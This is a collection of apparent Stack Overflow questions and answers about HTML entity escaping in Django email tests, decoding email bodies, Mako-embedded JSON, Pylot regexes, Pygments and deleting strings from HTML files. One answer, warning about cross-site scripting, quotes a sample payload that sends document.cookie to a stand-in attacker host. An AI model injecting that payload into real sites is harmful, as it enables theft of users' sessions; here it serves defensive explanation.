How to test content of a Django email?

I'm new to Django and am trying to use unittest to check if there's some text in an outbound email:
from django.core import mail
from django.test import TestCase

class test_send_daily_email(TestCase):
    def test_success(self):
        self.assertIn("My email's contents", mail.outbox[0].body)
However, I'm having an issue with mail.outbox[0].body. It contains \nMy email&#39;s contents\n, so it doesn't match the test text.
I've attempted a few different fixes with no luck:
str(mail.outbox[0].body).rstrip() - returns an identical string
str(mail.outbox[0].body).decode('utf-8') - fails because str has no attribute decode
Apologies, I know this must be a trivial task. In Rails I would use something like Nokogiri to parse the text. What's the right way to parse this in Django? I wasn't able to find instructions on this in the documentation.

It depends on whether your mail content is plain text or HTML. For HTML you can compare at the HTML level with assertInHTML; otherwise, the easy way is to escape the string you are testing against the same way Django escapes it.
# if you are testing HTML content
self.assertInHTML("My email's contents", mail.outbox[0].body)
# otherwise, escape the expected string the same way Django escapes template output
from django.utils.html import escape
self.assertIn(escape("My email's contents"), mail.outbox[0].body)
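If you would rather assert against plain text, a stdlib-only alternative (not part of the answer above) is to decode the HTML entities with html.unescape before asserting. The helper name body_contains_text and the sample body are hypothetical; in a Django test you would pass mail.outbox[0].body.

```python
import html


def body_contains_text(body: str, expected: str) -> bool:
    """Return True if `expected` appears in `body` once HTML entities are decoded."""
    # html.unescape turns &#39;, &#x27;, &amp; and friends back into plain characters
    return expected in html.unescape(body)


# Hypothetical body, shaped like the one in the question
sample_body = "\nMy email&#39;s contents\n"
print(body_contains_text(sample_body, "My email's contents"))  # True
```

Inside a TestCase this becomes self.assertIn("My email's contents", html.unescape(mail.outbox[0].body)), which keeps working whichever entity form (&#39; or &#x27;) your Django version emits.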

Related

Why is my script not consistently detecting contents in email bodies?

I've set up a sieve filter that invokes a Python script when it detects a postal service email about package deliveries. The sieve filter works fine and invokes the Python script reliably. However, the Python script does not reliably do its work. Here is my Python script, reduced to the relevant parts:
#!/usr/bin/env python3
import sys
from email import message_from_file
from email import policy
import subprocess

msg = message_from_file(sys.stdin, policy=policy.default)
if " out for delivery " in str(msg.get_body(("html"))):
    print("It is out for delivery")
I get email messages that have the string " out for delivery " in the body, but the script does not print "It is out for delivery". I've already checked the HTML in these messages, and it is 100% consistent. The frustrating thing, though, is that if I save the message that should have triggered the script from my mail reader and feed it to sieve-test manually, the script works 100% of the time!
How come my script never works during actual mail delivery but always works whenever I test it with sieve-test?
Notes:
The email contains only a single part, which is HTML, so I have to use the HTML part.
I know I can do a body test in sieve. I'm doing it in Python for reasons outside the scope of this question.

The problem is that you use str(msg.get_body(("html"))), which is unreliable for your purpose. What you get is the body of the message as a string, but encoded for inclusion in an email message. You're dealing with a MIME part, which may be encoded with quoted-printable, in which case the string you test for (" out for delivery ") could be split across multiple lines by the encoding. The string against which you test could contain the text you are looking for encoded like this:
[other text] out for =
delivery [more text]
The = sign is part of the encoding and indicates that the newline that follows is there because of the encoding rather than because it was there prior to encoding.
OK, but why does it always work when you use sieve-test? Your mail reader encodes the message differently when it saves it, and with that encoding the text you are looking for is not split across lines, so your script works. It is perfectly correct for the mail reader to save the message with a different encoding, as long as the decoded content has not changed.
What you should do is use msg.get_body(("html",)).get_content(). This returns the body in decoded form (transfer encoding and charset removed), i.e. the text as the postal service composed it. Note the trailing comma: ("html") is just the string "html", which only works by accident because the subtype lookup happens to succeed on a plain string as well.
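The difference between the two calls can be reproduced with the standard library alone. The message below is a hypothetical single-part HTML email whose quoted-printable body has a soft line break inside the searched phrase; str() keeps the wire format, while get_content() returns the decoded text.

```python
from email import message_from_string, policy

# Hypothetical single-part HTML message. The "=" at the end of the body's first
# line is a quoted-printable soft line break that falls inside the phrase.
RAW = (
    "From: shipping@example.com\n"
    "To: me@example.com\n"
    "Subject: Your package\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=utf-8\n"
    "Content-Transfer-Encoding: quoted-printable\n"
    "\n"
    "<p>Your package is out for =\n"
    "delivery today.</p>\n"
)

msg = message_from_string(RAW, policy=policy.default)
body = msg.get_body(preferencelist=("html",))

encoded = str(body)           # serialized message: soft line break still present
decoded = body.get_content()  # quoted-printable and charset decoded

print(" out for delivery " in encoded)  # False
print(" out for delivery " in decoded)  # True
```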

&quot; appears in JSONEncoder output, input is Python list of strings

I'm reading a text file, splitting it on \n and putting the results in a Python list.
I'm then using JSONEncoder().encode(mylist), but the result throws errors as it produces the javascript:
var jslist = [&quot;List item 1&quot;, &quot;List item 2&quot;]
I'm guessing switching to single quotes would solve this, but it's unclear how to force JSONEncoder/python to use one or the other.
Update: The context is a Pyramid application; here's the end of the function (components is the name of the list):
return {'components': JSONEncoder().encode(components)}
and then in the mako template:
var components = ${components};
which is being replaced as above.

Mako is escaping your strings because that is a sane default for most purposes. You can turn off the escaping on a case-by-case basis:
${components | n}

If you are embedding the JSON in an HTML page, beware. Mako does not know about script tags, so it escapes the string using the standard HTML escapes, but a <script> tag has different escaping rules. Notably, NOT escaping makes your site prone to cross-site scripting attacks if the JSON contains user-generated data. Consider the following value in a user-editable field (user.name):
user.name = "</script><script language='javascript'>" +
"document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
"+ document.cookie + '/>');</script><script language='vbscript'>"
Alas, Python's JSON encoder has no option for encoding JSON so that it is safe to embed in HTML, or even in JavaScript (a bug has been filed in the Python bug tracker). Meanwhile, use ensure_ascii=True and replace every '<' with '\\u003c' to protect against malicious users.
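A minimal sketch of that workaround; the function name json_for_script_tag is hypothetical. It goes slightly beyond the answer by also escaping > and & (Django's json_script filter escapes the same three characters), which costs nothing because a JSON or JavaScript parser reads \u003e and \u0026 as the original characters.

```python
import json


def json_for_script_tag(value) -> str:
    """Serialize `value` as JSON that can be placed inside an HTML <script> block.

    A sketch of the ensure_ascii + escape-'<' approach, not a vetted library function.
    """
    # ensure_ascii=True escapes every non-ASCII character, including U+2028/U+2029,
    # which older JavaScript engines treat as line terminators inside strings.
    text = json.dumps(value, ensure_ascii=True)
    # The HTML tokenizer ends the script at a literal "</script>"; \u003c is the
    # same character to a JSON/JS parser but invisible to the tokenizer.
    return (text.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


components = ["List item 1", "</script><script>alert(1)</script>"]
print(json_for_script_tag(components))
# ["List item 1", "\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e"]
```

In the Pyramid view you would return {'components': json_for_script_tag(components)} and render it in the Mako template with ${components | n}.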

Problems writing a regex in testcases.xml of pylot

I have to verify that a list of strings is present in the response to a SOAP request. I am using the Pylot testing tool. I know that if I put a plain string inside a <verify>abcd</verify> element, it works fine. I have to use a regex, though, and I'm having problems with it since I'm not good with regexes.
I have to verify if <TestName>Abcd Hijk</TestName> is present in my response for the request sent.
Following is my attempt to write the regex inside testcases.xml
<verify>[.TestName.][\w][./TestName.]</verify>
Is this the correct way to write a regex in the testcases.xml file? I want to verify exactly the tag names and their values mentioned above.
When I run the tool, it gives me no errors. But if I change the characters to <verify>[.TesttttName.][\w][./TestttttName.]</verify> and run the tool, it still runs without errors, even though this should be a failed run, since no tag like that is present in the response!
Could someone please tell me what I am doing wrong in the regex here?
Any help would be appreciated. Thanks!

The regex should look like the following:
<verify>&lt;TestName&gt;[\w\s]+&lt;/TestName&gt;</verify>
The reason is that Pylot holds the response content as plain text; the part of the response shown above would look like this:
.......<TestName>ABCd Hijk</TestName>.....
When Pylot parses an element in testcases.xml, it takes the element's value as text, so the XML entities &lt; and &gt; turn back into < and >. It then searches for that verify text in the response it got from the request.
Hence, whenever you want to verify something in Pylot with a regex, put the regex in the escaped form above so that it gives the required results.
Note: be careful about the format of the response you receive. To view the response to a request, enable the log messages in the tool, or, if you want to see the response on the console, edit the tool's engine.py module and insert print statements.

Here is the raw regular expression (without XML escaping). I assume you want to accept the English letters a-zA-Z, digits 0-9, the underscore _ and whitespace characters (space, newline, carriage return and a few others; check the documentation for details):
<TestName>[\w\s]+</TestName>
You need to escape the < and > to put it inside the <verify> tag:
&lt;TestName&gt;[\w\s]+&lt;/TestName&gt;
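A small stdlib sketch of the mechanism described in these answers, assuming Pylot reads the <verify> text with an XML parser and applies it with something like re.search (an assumption; check engine.py for the exact call). The XML fragment and response string are hypothetical. It also shows why the pattern from the question never fails: each [...] is a character class that matches a single character, so "Tes" inside any <TestName> tag already satisfies it.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical testcases.xml fragment; "<" and ">" must be escaped to stay well-formed XML
CASE_XML = r"<case><verify>&lt;TestName&gt;[\w\s]+&lt;/TestName&gt;</verify></case>"

# Hypothetical SOAP response, treated as plain text
RESPONSE = "<Result><TestName>Abcd Hijk</TestName></Result>"

# The XML parser decodes &lt; and &gt;, leaving the raw regex
pattern = ET.fromstring(CASE_XML).find("verify").text
print(pattern)                                        # <TestName>[\w\s]+</TestName>
print(bool(re.search(pattern, RESPONSE)))             # True
print(bool(re.search(pattern, "<Other>x</Other>")))   # False

# The attempt from the question: three single-character classes in a row
loose = r"[.TesttttName.][\w][./TestttttName.]"
print(bool(re.search(loose, RESPONSE)))               # True, matches "Tes"
```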

Django/Textile/Pygments: &quot; &#39; &gt; being escaped

I have a blog written in django that I am attempting to add syntax highlighting to. The posts are written and stored in the database as textile markup. Here is how they are supposed to be rendered via template engine:
{{ body|textile|pygmentize|safe }}
It renders all the HTML correctly and the code gets highlighted, but some characters within the code blocks are being escaped. Specifically double quotes, single quotes, and greater than signs.
Here is the Pygments filter I am using: http://djangosnippets.org/snippets/416/
I'm not sure which filter is actually putting the escaped characters in there or how to make it stop that. Any suggestions?

Shameless plug: I answered this on another page:
https://stackoverflow.com/a/10138569/1224926
The problem is that BeautifulSoup (rightly) assumes the code is unsafe and escapes it. But if you parse the highlighted output into a tree and pass that in, it works. So your line:
code.replaceWith(highlight(code.string, lexer, HtmlFormatter()))
should become:
code.replaceWith(BeautifulSoup(highlight(code.string, lexer, HtmlFormatter())))
and you get what you would expect.

Searching for specific HTML string using Python

What modules would be best for writing a Python program that searches through hundreds of HTML documents and deletes a given string of HTML?
For instance, if an HTML doc contains Test, I want to delete it from every HTML page that has it.
Any help is much appreciated, and I don't need someone to write the program for me, just a helpful point in the right direction.

If the string you are searching for will be in the HTML literally, then simple string replacement will be fine:
with open(html_file) as f:
    old_html = f.read()
new_html = old_html.replace(my_string, "")
if new_html != old_html:
    with open(html_file, "w") as f:
        f.write(new_html)
As an example of the string not being in the HTML literally, suppose you are looking for "Test" as you said. Do you want it to match these snippets of HTML?
<a href='test.html'>Test</a>
<A HREF='test.html'>Test</A>
Test
Test
and so on: the "same" HTML can be expressed in many different ways. If you know the precise characters used in the HTML, then simple string replacement is fine. If you need to match at an HTML semantic level, then you'll need to use more advanced tools like BeautifulSoup, but then you'll also have potentially very different HTML output than you started with, even in the sections not affected by the deletion, because the entire file will have been parsed and reconstituted.
To run the code over many files, you'll find os.walk (os.path.walk in Python 2) useful for finding files in a tree, or glob.glob for matching filenames against shell-style wildcard patterns.
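Putting the literal str.replace approach together with os.walk gives a sketch like the following. It assumes the files are UTF-8 and that the .html/.htm extensions identify the documents to edit; the function name strip_string_from_html_files is hypothetical, and like plain string replacement it only removes exact character-for-character matches.

```python
import os
from typing import List


def strip_string_from_html_files(root: str, target: str) -> List[str]:
    """Delete every literal occurrence of `target` from .html/.htm files under `root`.

    Returns the paths of the files that were rewritten.
    """
    changed = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            if not name.lower().endswith((".html", ".htm")):
                continue  # skip non-HTML files
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8") as f:
                old_html = f.read()
            new_html = old_html.replace(target, "")
            # Only rewrite files that actually contained the string
            if new_html != old_html:
                with open(path, "w", encoding="utf-8") as f:
                    f.write(new_html)
                changed.append(path)
    return changed
```

For example, strip_string_from_html_files("site", "<a href='test.html'>Test</a>") returns the list of files it rewrote. Files are overwritten in place, so it is worth running it on a copy first.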

BeautifulSoup or lxml.

htmllib (Python 2 only; it was removed in Python 3, where html.parser provides an HTMLParser class):
This module defines a class which can serve as a base for parsing text
files formatted in the HyperText Mark-up Language (HTML). The class is
not directly concerned with I/O — it must be provided with input in
string form via a method, and makes calls to methods of a “formatter”
object in order to produce output. The HTMLParser class is designed to
be used as a base class for other classes in order to add
functionality, and allows most of its methods to be extended or
overridden. In turn, this class is derived from and extends the
SGMLParser class defined in module sgmllib. The HTMLParser
implementation supports the HTML 2.0 language as described in RFC
1866.
